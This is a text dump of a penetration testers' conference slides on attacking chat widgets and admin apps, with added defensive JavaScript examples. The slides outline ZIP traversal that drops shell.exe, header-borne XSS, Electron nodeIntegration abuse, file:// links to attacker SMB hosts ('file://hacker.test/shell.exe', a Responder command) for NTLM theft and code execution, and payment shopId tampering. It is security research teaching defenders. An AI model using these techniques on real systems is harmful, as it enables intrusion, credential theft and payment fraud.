
Chat with a hacker

Increase attack surface for Pentest

A talk by Egor Karbutov and Alexey Pertsev


$ Who are we

Egor Karbutov & Alexey Pertsev


Penetration testers @Digital Security
Speakers
Bug Hunters

2
Agenda
Chats-Chats-Chats
How does it work?
ZIP old tricks
RCE via ZIP
So much XSS
Electron vulnerability
Scheme file:// for your chats
Payment through chats
Mobile Application Chats
3
Disclaimer

Chat images are used as examples


All coincidences are accidental

4
Chats-Chats-Chats
What are you talking about?
Another chat?

5
Chat Types
Browsers / CMS
Desktop Application
Mobile SDK
Social Networks

8
Does it help us? Pentest!
Increase attack surface
Social engineering attacks
Vulnerabilities in own implementations
Vendor vulnerabilities
User support is on the local network
Lack of (network) segmentation

9
Chat for browsers. How does it work?

JavaScript

CMS = JS

10
JavaScript Privileges
XMLHttpRequest
Control of user data
Cookie
Tokens
Sensitive information
HTML replace
Remote update

11
Services

12
Files
Social engineering attacks?
Would you send an EXE file?
We can use a couple of stupid tricks with ZIP

13
ZIP Bomb

Hi @sergeybelove
42 Kb from 2014 :)
24 Gb?
322 Gb?
132 Tb?

4.5 Pb

14
ZIP Format

15
ZIP Traversal

16
Let's send a file
Components: User interface -> api.service.test (Operator standalone program) -> storage.service.test
Sending the file: cat.png
cat.png == id
Message = { File_path = /file/id }
Concat('https://storage.service.test', file_path);
Downloading the file:
GET /file/id HTTP/1.1
Host: storage.service.test
Saved as %Downloads%/cat.png

17
RCE via File
Components: User interface -> api.service.test (Operator standalone program) -> storage.service.test.hacker.site
Sending the file: cat.png
Message = { File_path = .hacker.site/file/id }
Concat('https://storage.service.test', file_path);
File name: cat.png -> ../../../../../../../shell.exe == id
Downloading the file:
GET /file/id HTTP/1.1
Host: storage.service.test.hacker.site
Saved as %Downloads%/shell.exe

18
XSS
XSS has the maximum impact
High level of message security
Non-obvious places:
Headers
GET/POST parameters for analytics
Our target is the admin page or the statistics page

19
Headers for XSS
User-Agent
Referer
Cookie
Origin
Custom Headers

20
Parameters for XSS
Methods:
GET
POST
WebSocket

Keep it simple. Use gray box analysis!

21
Admin & Statistic Page
Waiting for someone to visit this page
Abuse complaints to make administrators visit it

22
The sad consequences
XSS into chat settings
Appearance customisation
Fonts
Labels
Color
Image
etc

23
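The two sinks these slides name, a statistics page that echoes request headers and a chat appearance form whose values land on every client page, handled safely, as an added JavaScript example that is not from the talk. The visitor records are constructed; the font allowlist, the field names and the function names are assumptions.

```javascript
// Escape the characters that matter when interpolating into HTML text or
// double-quoted attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed visitor records, as a statistics page receives them from the chat
// widget; the second carries payloads in User-Agent and Referer.
const VISITOR_LOG = [
  { ip: '203.0.113.7', userAgent: 'Mozilla/5.0 (X11; Linux x86_64)',
    referer: 'https://pentest_client.shop.test/' },
  { ip: '198.51.100.9', userAgent: '<script>alert(1)</script>',
    referer: 'https://x.test/" onmouseover="alert(1)' },
];

// Vulnerable: header values are attacker-controlled strings dropped into markup.
function renderVisitorRowUnsafe(v) {
  return `<tr><td>${v.ip}</td><td>${v.userAgent}</td><td><a href="${v.referer}">ref</a></td></tr>`;
}

// Hardened: every interpolated value is escaped, and the referer becomes a link
// only when it parses as an http(s) URL (the parsed, re-serialised form is used).
function renderVisitorRow(v) {
  let ref = escapeHtml(v.referer);
  try {
    const u = new URL(v.referer);
    if (u.protocol === 'https:' || u.protocol === 'http:') {
      ref = `<a href="${escapeHtml(u.href)}">${ref}</a>`;
    }
  } catch { /* not a URL: shown as text only */ }
  return `<tr><td>${escapeHtml(v.ip)}</td><td>${escapeHtml(v.userAgent)}</td><td>${ref}</td></tr>`;
}

// Appearance settings end up inside CSS and HTML on every client page, so they
// are validated against strict shapes rather than trusting the admin form.
const FONT_ALLOWLIST = new Set(['Arial', 'Helvetica', 'Roboto']); // assumed
function validateAppearance(s) {
  const errors = [];
  if (!/^#[0-9a-fA-F]{6}$/.test(s.color)) errors.push('color');
  if (!FONT_ALLOWLIST.has(s.font)) errors.push('font');
  if (typeof s.label !== 'string' || s.label.length > 64) errors.push('label');
  try {
    if (new URL(s.image).protocol !== 'https:') errors.push('image');
  } catch { errors.push('image'); }
  return errors; // empty means the settings may be stored
}
```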
Attack scheme 1
Actors: Evil Hacker, pentest_client.shop.test, admin_vendor.chat.test, statistic_vendor.chat.test
XSS attack on chat client admins
JS code injection into chat settings
XSS from any user on the site pentest_client.shop.test

24
Attack scheme 2
Actors: Evil Hacker, chat.vendor, admin.chat.vendor, statistic.chat.vendor
XSS attack on chat vendor admins
JS code injection into chat settings on chat.vendor
XSS from any user on chat clients (chat.test, admin_vendor.chat.test, statistic_vendor.chat.test)
All chat clients' services

25
Electron
Open-source framework to build desktop apps using HTML, CSS and JavaScript
Electron accomplishes this by combining Chromium and Node.js into a single runtime
Chat vendors use Electron for admin desktop applications

26
Electron Threat Model
Electron Threat Model = Browser Threat Model
Untrusted content from the web
SOP Bypass
Control whether access to Node.js primitives is allowed from JavaScript
Potential access to Node.js primitives
Limited sandbox
XSS == RCE
https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdf
https://blog.doyensec.com/2017/08/03/electron-framework-security.html
27
Electron sandbox bypass
nodeIntegration = true

Electron 1.6.7

28
Electron sandbox bypass
nodeIntegration = true
Misconfiguration
SOP bypass via presence of privileged URLs
Switch it to false

29
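The misconfiguration from slides 28 and 29 (nodeIntegration left on in an Electron 1.6.7 admin app, so XSS == RCE) expressed as an audit of BrowserWindow webPreferences, with the weak configuration beside the corrected one; an added example, not Electron's or the vendor's code. The version defaults it assumes: nodeIntegration was on by default before Electron 5, contextIsolation became the default in Electron 12 and the renderer sandbox in Electron 20; the function names are assumptions.

```javascript
// Explicit values in `prefs` always win; otherwise the version default applies.
function auditWebPreferences(prefs, electronMajor) {
  const p = prefs || {};
  const nodeIntegration = p.nodeIntegration ?? (electronMajor < 5);
  const contextIsolation = p.contextIsolation ?? (electronMajor >= 12);
  const sandbox = p.sandbox ?? (electronMajor >= 20);
  const findings = [];
  if (nodeIntegration) findings.push('nodeIntegration: renderer JavaScript can reach Node.js, so XSS == RCE');
  if (!contextIsolation) findings.push('contextIsolation off: page scripts share a world with the preload script');
  if (!sandbox) findings.push('sandbox off: a renderer compromise is not contained by the OS sandbox');
  if (p.webSecurity === false) findings.push('webSecurity off: same-origin policy disabled for this window');
  if (p.allowRunningInsecureContent === true) findings.push('allowRunningInsecureContent: http content runs inside an https page');
  return findings;
}

// The weak configuration from the talk: an Electron 1.6.7 admin app with nodeIntegration on
// (on that version it would be on even if the key were omitted).
const WEAK_PREFS = { nodeIntegration: true };

// The corrected configuration: every security-relevant flag set explicitly, so
// the outcome no longer depends on which Electron version's defaults apply.
const HARDENED_PREFS = {
  nodeIntegration: false,
  contextIsolation: true,
  sandbox: true,
  webSecurity: true,
  allowRunningInsecureContent: false,
};

// A window that will display untrusted (web) content must pass the audit cleanly.
function safeForUntrustedContent(prefs, electronMajor) {
  return auditWebPreferences(prefs, electronMajor).length === 0;
}
```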
File://
Typically used to retrieve files from networks and local disks
Vulnerabilities in the wild:
Local File Inclusion
XXE
SSRF
In the Windows context:
NTLM hash stealing
NTLM relay
RCE

30
Chats with File://
Admin desktop application for Windows
The file:// scheme is available
A file:// link is rendered like any other hyperlink

31
Chats with File://
Pentest in local network
RCE on client devices and servers
Weak & duplicate passwords (local services, servers, client devices)
Scheme: Hacker -> pentest_client.shop.test -> Admin desktop application
Send file:// link: file://hacker.test/
The admin desktop application sends its NTLM hash to the hacker's SMB server
Hash cracking or SMB relay

32
Tricks with File:// 1
What can we do?
file:// with local files
file://C:/Windows/System32/calc.exe
But we can't pass arguments
file://C:/Windows/System32/cmd.exe /C calc
Every character in the file link is part of the path
It is only for social engineering attacks
You can combine this with the dir traversal ZIP trick

33
Tricks with File:// 2
file:// with executable files from the Internet (hacker's SMB server)
file://internet_IP/pwn.exe

34
Chats with File://
Pentest of an Internet service and the local network
RCE on the client device (admin OS)
Social engineering attacks + file://local_files
Scheme: Hacker -> pentest_client.shop.test -> Admin desktop application
Send file:// link to an executable file: file://hacker.test/shell.exe
Clicking on the link: shell.exe is downloaded from the hacker's SMB server and executed

35
Tricks with File:// 3
How to bypass the Windows alert window?
"This file is in a location outside your local network"
Easy, I'll use local addresses:
10.0.0.0 - 10.255.255.255
172.16.0.0 - 172.31.255.255
192.168.0.0 - 192.168.255.255
No, it doesn't work

36
Tricks with File:// 3
For Windows, the local network means servers with NetBIOS names
NetBIOS name: a domain name without a dot
If I use the NetBIOS name "netbios" instead of a local IP, I can bypass that alert
file://netbios/pwn.exe
How?
smbd (Samba) server + responder -d netbios -I eth0

Works only in local networks

37
Chats with File://
NetBIOS name trick in the local network
Without the alert window on the admin OS
Scheme: Hacker -> pentest_client.shop.test -> Admin desktop application
Send file:// link to an executable file: file://netbios/pwn.exe
Clicking on the link: shell.exe is downloaded from the hacker's SMB server and executed

38
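The client-side mitigation for slides 30 to 38: a chat client should never turn a file:// (or UNC) reference in an incoming message into a clickable link, so that the hash-leak and execute-from-share paths above are not reachable from a message. An added JavaScript example, not the vendor's code; the scheme allowlist and the function names are assumptions.

```javascript
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']); // assumed allowlist

function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Returns a normalised href when the target may be linked, otherwise null.
// file:, javascript:, smb: and similar schemes fail the allowlist; UNC paths
// (\\host\share), '//host/...' and drive paths are file system references and
// are rejected before URL parsing even sees them.
function safeLinkTarget(raw) {
  if (typeof raw !== 'string') return null;
  const text = raw.trim();
  if (/^(\\\\|\/\/|[A-Za-z]:[\\/])/.test(text)) return null;
  let url;
  try { url = new URL(text); } catch { return null; } // relative text: not a link
  return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
}

// Linkify a chat message: a whitespace-separated token becomes an anchor only
// if safeLinkTarget accepts it; file://hacker.test/shell.exe stays plain text.
function renderMessage(text) {
  return String(text).split(/(\s+)/).map((tok) => {
    const href = safeLinkTarget(tok);
    if (!href) return escapeHtml(tok);
    return `<a href="${escapeHtml(href)}" rel="noopener noreferrer">${escapeHtml(tok)}</a>`;
  }).join('');
}
```

Desktop clients built on Electron should apply the same allowlist before calling `shell.openExternal`, since that call hands the URL to the OS handler regardless of scheme.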
Add payment system
Useful?
Be careful where you store configs!

39
Hacker can buy an iPhone X for free
Shop backend
POST /pay?params=1
Payment config: shopId, customer, sum, item
checkURL -> YES
avisoURL
Redirect to payment page
Evil Hacker

40
Stealing money for hackers
POST /pay?params=1 with shopId, customer, sum, item
Steps to take profit:
Register own shop with a similar name
Change shopId via XSS
Call checkURL and avisoURL as needed
All payments go to the hackers!

Protection:
Check Yandex IPs
Add anti-CSRF token for the config form
DO NOT SHOW ANY PASSWORDS EVER

41
Mobile Application SDK
Custom code for native applications
All code runs with the same privileges in the mobile OS
3rd-party applications have full access inside your app:
Change the user interface
Access local files in the app folder
Access dynamic user data
Change app logic (like tapjacking)
Vulnerabilities:
Custom implementation
WebView JS manipulation (Android)
https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
42
ExpensiveWall
ExpensiveWall is spread to different apps as an SDK called "gtk"
ExpensiveWall sends data about the infected device to its C&C server, including its location and unique identifiers, such as MAC and IP addresses, IMSI, and IMEI
Total downloads of infected applications = 5,904,511

https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/

43
Don't forget about
Farms that inflate application ratings
Dynamic code execution and code update:
JSPatch (iOS)
Android Runtime
Legitimate ad SDKs that were vulnerable
Applications with a fake (ad) SDK
Code review of custom SDK code

44
Conclusion
For pentest and red team:
Increase your attack surface via 3rd-party services and program libraries
For you and your project:
Think about how much you trust other people's implementations, applications on your devices, plugins in your programs
Don't forget about code review!

All vulnerabilities were reported and fixed

45
Questions? Or
Special THX to @cherboff and @barracud4_
@ShikariSenpai @_p4lex
Alexey Pertsev
Egor Karbutov
